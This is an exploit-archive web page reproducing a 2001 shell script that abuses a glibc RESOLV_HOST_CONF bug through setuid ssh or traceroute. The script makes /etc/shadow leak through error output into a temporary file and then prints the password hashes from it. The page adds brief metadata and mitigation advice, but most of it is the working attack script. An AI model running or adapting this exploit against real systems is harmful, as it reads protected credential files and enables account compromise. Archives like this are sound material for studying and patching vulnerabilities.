Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
SSH Exploit for glibc-2.2 and openssh-2.3.0p1 - exploit.company
header-logo
Suggest Exploit
vendor:
glibc
by:
Charles Stevenson (csteven@newhope.terraplex.com)
7.5
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: glibc
Affected Version From: glibc-2.1.9x
Affected Version To: glibc-2.2
Patch Exists: NO
Related CWE:
CPE: a:glibc:glibc:2.2
Metasploit:
Other Scripts:
Platforms Tested: Debian 2.3, Redhat 7.0
2001

SSH Exploit for glibc-2.2 and openssh-2.3.0p1

This exploit takes advantage of a glibc bug to escalate privileges and read the /etc/shadow file. It is specifically designed for glibc versions 2.1.9x and above.

Mitigation:

Upgrade glibc to a version that is not vulnerable to this exploit. Remove setuid permissions from vulnerable binaries.
Source

Exploit-DB raw data:

# Charles Stevenson <csteven@newhope.terraplex.com>
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****krochos@linuxmail.org****)
# Edit this if you have a problem with path

ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow        # File to read
###############################################################################

echo "$ssh"
echo "[*] Checking permisions..."

if [ ! -u $ssh ]; then
        echo "$ssh is NOT setuid on this system or does not exist at all!"
        if [ ! -u $traceroute ]; then
          echo "$traceroute is NOT setuid on this system or does not exist at all!"
          exit 0
        fi
fi

export RESOLV_HOST_CONF=$FILE

echo "[*] Glibc bug found by Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>"
echo "[*] krochos@linuxmail.org"
sleep 1
echo "[*] export  RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv |  cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '

# milw0rm.com [2001-01-25]